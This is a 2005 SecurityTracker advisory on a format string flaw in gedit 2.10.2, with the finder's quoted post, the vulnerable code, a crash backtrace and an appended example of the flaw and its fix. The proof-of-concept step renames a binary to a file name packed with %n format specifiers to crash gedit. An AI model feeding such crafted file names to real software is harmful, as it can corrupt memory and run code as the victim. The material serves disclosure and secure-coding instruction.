SecurityTracker.com
Category:  Application (Generic)  >  gedit
Vendors:  Gnome Development Team
gedit Format String Flaw May Let Remote Users Cause Arbitrary Code to Be Executed
SecurityTracker Alert ID:  1014179
SecurityTracker URL:  http://securitytracker.com/id?1014179
CVE Reference:  CAN-2005-1686
Date:  Jun 13 2005
Impact:  Execution of arbitrary code via network, User access via network
Fix Available:  Yes
Exploit Included:  Yes
Vendor Confirmed:  Yes
Version(s): 2.10.2
Description:  A vulnerability was reported in gedit. A remote user may be able to cause arbitrary code to be executed.

A remote user can create a file with a specially crafted filename that, when processed by the target user, will trigger a format string flaw in gedit and execute arbitrary code. The code will run with the privileges of the target user.

The flaw resides in the gedit_utils_error_reporting_loading_file () function.

jsk:exworm (www.0xbadexworm.org) discovered this vulnerability.

Impact:  A remote user may be able to cause arbitrary code to be executed when the target user processes a specially named file.
Solution:  The vendor has released a fixed version (2.10.3), available at:

http://ftp.gnome.org/pub/GNOME/sources/gedit/2.10/gedit-2.10.3.tar.gz
http://ftp.gnome.org/pub/GNOME/sources/gedit

Vendor URL:  www.gnome.org/projects/gedit/
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)
Reported By:  yan feng <jsk@ph4nt0m.net>
Message History:   This archive entry has one or more follow-up message(s) listed below.
Jun 13 2005 (Red Hat Issues Fix) gedit Format String Flaw May Let Remote Users Cause Arbitrary Code to Be Executed   (bugzilla@redhat.com)
Red Hat has released a fix.



 Source Message Contents

Date:  20 May 2005 20:26:28 -0000
From:  yan feng <jsk@ph4nt0m.net>
Subject:  pst.advisory: gedit fun. opensource is god .lol windows

 



       pst.advisory: gedit fun. opensource is god .lol windows

                    www.ph4nt0m.org

Systems affected:

gedit 2.10.2


no affected

all exploitable

1: why: gedit is a power tool .. it is used to edit *.c *.pl *.py ............

when it opens a bin .. this bin's name or filename is a format string ... it is exploitable


2:tips:


void
gedit_utils_error_reporting_loading_file (
        const gchar *uri,
        const GeditEncoding *encoding,
        GError *error,
        GtkWindow *parent)
{
        /* ............ */

        if (error_message == NULL)
        {
                if ((error == NULL) || (error->message == NULL))
                        error_message = g_strdup_printf (
                                _("Could not open the file \"%s\"."),
                                uri_for_display);       /* ................name */
                else
                        error_message = g_strdup_printf (
                                _("Could not open the file \"%s\".\n\n%s."),
                                uri_for_display, error->message);       /* ..........name */
        }

        g_free (encoding_name);

        dialog = gtk_message_dialog_new (
                parent,
                GTK_DIALOG_MODAL | GTK_DIALOG_DESTROY_WITH_PARENT,
                GTK_MESSAGE_ERROR,
                GTK_BUTTONS_OK,
                error_message);         /* ....................boom...... */


3: more show

Program received signal SIGSEGV, Segmentation fault.
0x40f9b740 in gtk_window_set_transient_for () from /usr/lib/libgtk-x11-2.0.so.0
(gdb) bt
#0 0x40f9b740 in gtk_window_set_transient_for ()
from /usr/lib/libgtk-x11-2.0.so.0
#1 0x40ea33c9 in gtk_message_dialog_new () from /usr/lib/libgtk-x11-2.0.so.0
#2 0x080723a1 in gedit_utils_error_reporting_loading_file ()
#3 0x080779f8 in gedit_file_open_from_stdin ()
#4 0x00000000 in ?? ()
#5 0x083f98e8 in ?? ()
#6 0x0813f538 in ?? ()
#7 0x080ad668 in TC_GNOME_Gedit_Application_struct ()
#8 0x08339e30 in ?? ()
#9 0x00000000 in ?? ()
#10 0x41287ca1 in __default_morecore () from /lib/libc.so.6


4: A LAME proof-of-concept

bash-2.05b#cat fmtexp.c

#include <stdio.h>

int
main()
{
    printf("hah gedit\n");
}


bash-2.05b#gcc -o fk fmtexp.c

bash-2.05b#mv fk AA%n%n%n.c

bash-2.05b#gedit AA%n%n%n.c

no working exploit will be here..:P



CREDIT:

jsk:exworm (www.0xbadexworm.org) discovered this vulnerability

ths: all members from PST and doris
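
The pattern behind this advisory, shown next to its usual correction, as an added example that is not taken from the advisory, the original post, or gedit's source. `dialog_new` is a hypothetical stand-in for `gtk_message_dialog_new` (so the block builds without GTK), the other function names and sample file names are constructed, and the flawed path is only fed `%%`, which printf defines as a literal `%`.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for gtk_message_dialog_new(): its last fixed
 * parameter is a printf-style format. Renders into buf instead of a dialog. */
static void dialog_new(char *buf, size_t n, const char *message_format, ...)
{
    va_list ap;
    va_start(ap, message_format);
    vsnprintf(buf, n, message_format, ap);
    va_end(ap);
}

/* First pass: the name is inserted with a constant format (safe on its own). */
static void build_error(char *msg, size_t n, const char *name)
{
    snprintf(msg, n, "Could not open the file \"%s\".", name);
}

/* Flawed: the finished message, file name included, is parsed as a format. */
static void show_error_flawed(char *out, size_t n, const char *name)
{
    char msg[256];
    build_error(msg, sizeof msg, name);
    dialog_new(out, n, msg);
}

/* Corrected: constant "%s" format, the message travels as data. */
static void show_error_fixed(char *out, size_t n, const char *name)
{
    char msg[256];
    build_error(msg, sizeof msg, name);
    dialog_new(out, n, "%s", msg);
}

int main(void)
{
    char out[256];
    /* Constructed sample names. The flawed path only ever sees "%%", which
     * printf defines as a literal '%', so this demo has no undefined behaviour. */
    show_error_flawed(out, sizeof out, "100%%.c");
    printf("flawed: %s\n", out);   /* one '%' was consumed by the second parse */
    show_error_fixed(out, sizeof out, "100%%.c");
    printf("fixed:  %s\n", out);
    show_error_fixed(out, sizeof out, "AA%n%n%n.c");
    printf("fixed:  %s\n", out);   /* the advisory's file name, shown verbatim */
    return 0;
}
```

Building callers with `-Wformat -Wformat-security` flags a non-literal format argument at compile time when the callee is declared with a printf format attribute.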

 



Copyright 2005, SecurityGlobal.net LLC